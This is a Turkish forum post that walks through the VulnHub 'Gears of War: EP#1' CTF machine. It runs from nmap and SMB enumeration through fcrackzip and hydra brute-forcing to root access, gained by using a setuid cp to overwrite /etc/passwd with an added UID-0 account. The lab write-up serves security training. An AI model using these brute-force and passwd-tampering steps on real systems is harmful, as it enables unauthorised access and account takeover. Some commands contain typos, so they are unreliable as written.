TARİHTE BUGÜN

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Gears of War: EP#1 Zafiyetli Makine Çözümü

PigGunner - ait Kullanıcı Resmi (Avatar)
Junior Green Team
Üyelik tarihi:
07/2013
Nereden:
Turk
Mesajlar:
2.270
Konular:
90
Teşekkür (Etti):
179
Teşekkür (Aldı):
360
Ticaret:
(0) %
bir Hafta önce
#1
Gears of War: EP#1 Zafiyetli Makine Çözümü
Gears of War: EP#1 Zafiyetli Makine Çözümü

Seviye: Orta

Görev: Root kullanıcısının ayrıcalıklarını elde etmemiz ve mücadeleyi tamamlamak için bayrağı okumamız gereken bir CTF.

Makine 17 Ekim 2019’da eDu809 tarafından yayınlanmıştır.

Yüklemek için siteyi ziyaret edebilirsiniz.

Bağlantı: https://www.vulnhub.com/entry/gears-of-war-ep1,382/

OVA şeklinde hazır olarak kurabilirsiniz.

Örn: Virtual Machine --> File --> Open --> Gear_Of_War#1

Başlayalım.



Çözüm

Öncelikle ‘netdiscover’ yazarak ağdaki IP’leri listeliyoruz.

Kod:
netdiscover
Daha sonra nmap(network mapping)(ağ haritalandırma) aracı yardımıyla çözeceğimiz makinenin IP’sindeki açık portları listeliyoruz.

Buradaki –p- parametresi aracın bütün portları (65535) taramasını sağlar.

Kod:
nmap –p- IP_ADRESI
Kod:
nmap –p- 192.168.1.21
Nmap bize aşağıdaki çıktıyı verdi ve 80 yani http portunun açık olduğunu gördük siteye işimize yarayacak bir şey var mı diye bakıyoruz.

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

139/tcp open netbios-ssn

445/tcpopenmicrosoft-ds



Sitede gezindiğimizde işimize yarayacak bir bilgi bulamadık. Fakat 445 SMB portu açık olduğu için oradaki dizin ve dosyaları kontrol edeceğiz. ( SMB Nedir? Server Message Block(Sunucu İleti Bloğu), server-client arasındaki iletişimi sağlayan bir ağ protokolüdür. SMB protokolü, Windows sistemlerinin 139 ve 445 portlarını kullanarak, paylaşılan dosyalara erişimi, ağlar, yazıcılar ve çeşitli bağlantıları sağlar.)

Smb sunucusuna bağlanıyoruz. Buradaki –L komutu Host gireceğimizi belirtiyor.

Kod:
smbclient –L 192.168.1.21
Önümüze IPC ve Disk tipinde iki tane seçenek çıktı. IPC işlemlerin birbiri ile haberleşebilmesi için kullanılıyor. Şimdilik işimize yaramayacak. Disk tipinde olan LOCUS_LAN$’a giriş yapmayı deneyelim ve içini kontrol edelim.

Kod:
smbclient //192.168.1.21/LOCUS_LAN$
Kod:
ls
Listeledikten sonra bakıyoruz ki, msg_horda.zip ve SOS.txt isimli iki dosya var. Bunları get komutu ile indirelim.

Kod:
get msg_horda.zip
Kod:
get SOS.txt
---





Daha sonra makinemizdeki /home/kali dizinine dönerek indirdiğimiz dosyalara bakıyoruz ve msg_horda.zip dosyasının şifreli olduğunu görüyoruz. Daha sonra SOS.txt dosyasını kontrol ediyoruz. Burada bize şifre ile ilgili ipucu verilmiş.

SOS.txt’yi kullanarak wordlist oluşturuyoruz. Kelime listesini oluşturmak için crunch isimli aracı kullanıyoruz.

(Crunch nedir? Crunch, standart bir karakter kümesi veya belirttiğiniz bir karakter kümesi belirtebileceğiniz bir kelime listesi üreticisidir. Crunch olası tüm kombinasyonları ve permütasyonları üretebilir.)

Basitçe crunch aracının kullanımını anlatmak gerekirse,

Kod:
crunchmin_harf_sayısımaks_harf_sayısı -t kalıbı_belirtin @%%, -o çıktının_yazılacağı_txtnin_adı
Buradaki kalıp belirtme bölümünde;

@ küçük harf,

, büyük harf,

% sayı,

^ sembol ekler.

Daha detaylı bilgi edinmek isterseniz aşağıdaki komutu yazabilirsiniz.

Kod:
man crunch
Kod:
crunch 4 4 -t @%%, -o wordlist
Belirttiğimiz kalıba göre kelime listemiz oluşturuldu.



Şimdi zip dosyasını açmak için oluşturduğumuz kelime listesini kullanarak zip dosyasına kaba kuvvet(brute-force) saldırısı yapacağız.

Fcrackzipkali’nin yeni versiyonunda kaldırılmış bu yüzden aşağıdaki komut ile indirdik.

Kod:
apt-get install fcrackzip
Daha sonra aşağıdaki komutu girerek çalıştırıyoruz. Burada –D komutu vereceğimiz wordlist’i sözlük gibi kullanıp her satırı denemesini sağlıyor, –u komutu verilen kelime listesi ile zip dosyasındaki ilk dosyayı açmaya çalışmasını sağlıyor (brute-force işlemi) –v aracın yaptığı işlemleri size bildirmesini sağlar genelde hataların bulunması için kullanılır veya bir tar dosyasının yaratılırken ya da açılırken elden geçen dosyaların isimlerini ekranda listelemek icin kullanılır, –p kaba kuvvet saldırısına nereden başlayacağını belirtmemizi sağlar.

Kod:
sudo frackzip -D -u -v -p wordlist msg_horda.zip
Ve şifreyi bulduk;

şifre: r44M

Verbose farkını da görebilmeniz için iki adet tarama yaptırdım.



key.txt dosyasını okuduğumuzda bize şifre ssh için şifre verdiğini görüyoruz ancak hala kullanıcı adını elde etmemiz gerekiyor. Bunun için hydra aracını kullanarak yeniden brute-force saldırısı yapıyoruz.

Kod:
sudohydra -L /home/kali/Desktop/rockyou.txt -p 3_d4y -T4 192.168.1.21 ssh
Burada –L listeyi, -p şifreyi -T4 ise çalışacak görev sayısını belirtmektedir.

Not: rockyou.txt, normalde /usr/share/wordlists/ dizininde bulunur.

Kullanıcı adının marcus olduğunu bulduk. Şifre de az önce key.txt’nin içinde yazdığı gibi 3_d4y‘di.



Giriş yapıyoruz.

Kod:
yes
Kod:
3_d4y


Giriş yaptık şimdi id diyerek kullanıcı ve grup isimlerini listeliyoruz.

Kod:
id
Daha sonra kullanıcı giriş bilgilerini okumak için /etc dizinine girmeye çalışıyoruz ancak marcus kullanıcısının buraya giriş için izni olmadığını görüyoruz.

Kod:
cd /etc
Hedef makinemiz bash kabuğunda olduğundan, TTY tahsisi için SSH'yi zorlamak için bir komut kullanıyoruz. Bu, komutları yönetici olarak çalıştırmamıza yardımcı olacaktır. Daha sonra /etc dizinine erişiyoruz.

Kod:
ssh marcus@192.168.1.21 -t "bash --noprofile"
Buradaki -t yalancı terminal tahsisini zorlar. Bu, uzak bir makinede isteğe bağlı ekran tabanlı programları yürütmek için kullanılabilir; menü hizmetleri uygulanırken. Birden fazla -t seçeneği, ssh'ın yerel tty'si olmasa bile tty ayırmayı zorlar.

Buradaki –noprofile komutu ise bash kabuğunun kullanıcı ayarlamaları olmadan çalıştırılmasını sağlar.



Bin dizinini biraz inceledikten sonra currentkullanıcısnıncp (kopyalama) komutunu kullanabildiğini görüyoruz.

Kod:
find /bin -type f -perm -u=s 2>/dev/null


Kopyalama iznine sahip olduğu için openssl kullanarak oluşturduğumuz yeni kullanıcıyı nano editörünü kullanarak ekleyeceğiz.

piggunner isimli tht şifreli kullanıcı için gerekli ssl kodunu oluşturduk.

Kod:
openssl passwd –1 –salt piggunner tht
piggunner isimli tht şifreli kullanıcı için gerekli ssl kodunu oluşturduk.

Çıktı: $1$piggunne$8r8M/TPHjlhT4zcTm5zaX.



Şimdi bunu /etc/passwd ‘a eklememiz gerekiyor ancak yazma iznimizin olmadığını hatırlıyoruz. Ama cp komutunu kullanabiliyoruz.

Bu yüzden önce /etc/passwd /tmp/ dizinine kopyalıyoruz.

Kod:
cp /etc/passwd /tmp/passwd
Daha sonra /tmp dizinine gelip passwd’enano düzenleyicisini kullanarak oluşturduğumuz kullanıcıyı en sona ekliyoruz.

Kod:
nano passwd


Açılan pencerede en sona gerekli izinlere (root dizinine girmemiz gerekiyor) sahip şekilde ssl’mizi ekliyoruz.

Kod:
piggunner:$1$piggunne$8r8M/TPHjlhT4zcTm5zaX.:0:0::/root:/bin/bash
‘Ctrl+E’ diyerek çıkış yapıyoruz kaydetmek ister misiniz diye soruyor ‘y’ tuşuna basıyoruz.

Kod:
cat passwd | tail
Yukarıdaki komut ile passwd dosyasının sonunu okuyoruz eklenmiş mi diye kontrol ediyoruz. Daha sonra yeni passwd dosyamızı /etc/passwd ‘daki orijinal olanın yerine kopyalıyoruz.

Kod:
cp /tmp/passwd /etc/passwd


Şimdi oluşturduğumuz izinlere sahip kullanıcımıza giriş yapabiliriz.

Kod:
su piggunner
Kod:
tht
Aşağıdaki komut ile kim olduğumuzu kontrol ediyoruz.

Kod:
whoami
Evet artık bizde bir root kullanıcısıyız. Root dizinine gelip dosyaları listeliyoruz.

Kod:
cd /root
Kod:
ls –al
.flag.txt diye bir dosya görüyoruz. Flag’imizi bulduk okuyarak CTF’i sonlandırıyoruz.

Kod:
cat .flag.txt






Güzel bir makine çözümüydü, diğer makine çözümlerime nazaran kaba kuvvet saldırısına ağırlık verildiği için çözümü(tool kullanımına dayalı olduğu için) daha kolaydı, umarım beğenmişsinizdir.
---------------------
Copyright by PigGunner.
Konu PigGunner tarafından (bir Hafta önce Saat 19:34 ) değiştirilmiştir.
"P4RS, PourLa, THE HACKER 21, myRANN Teşekkür etti.
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2017
Mesajlar:
3.026
Konular:
89
Teşekkür (Etti):
210
Teşekkür (Aldı):
956
Ticaret:
(0) %
bir Hafta önce
#2
Cevap: Gears of War: EP#1 Zafiyetli Makine Çözümü
Emeğine sağlık , yazım ve imla da güzel .
--------------------- ‘’ Mufassal kıssa başlarsın, garip efsane söylersin.’’

PourLa - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.242
Konular:
276
Teşekkür (Etti):
253
Teşekkür (Aldı):
265
Ticaret:
(0) %
bir Hafta önce
#3
Cevap: Gears of War: EP#1 Zafiyetli Makine Çözümü
Ellerin dert görmesin 😊
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram




Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı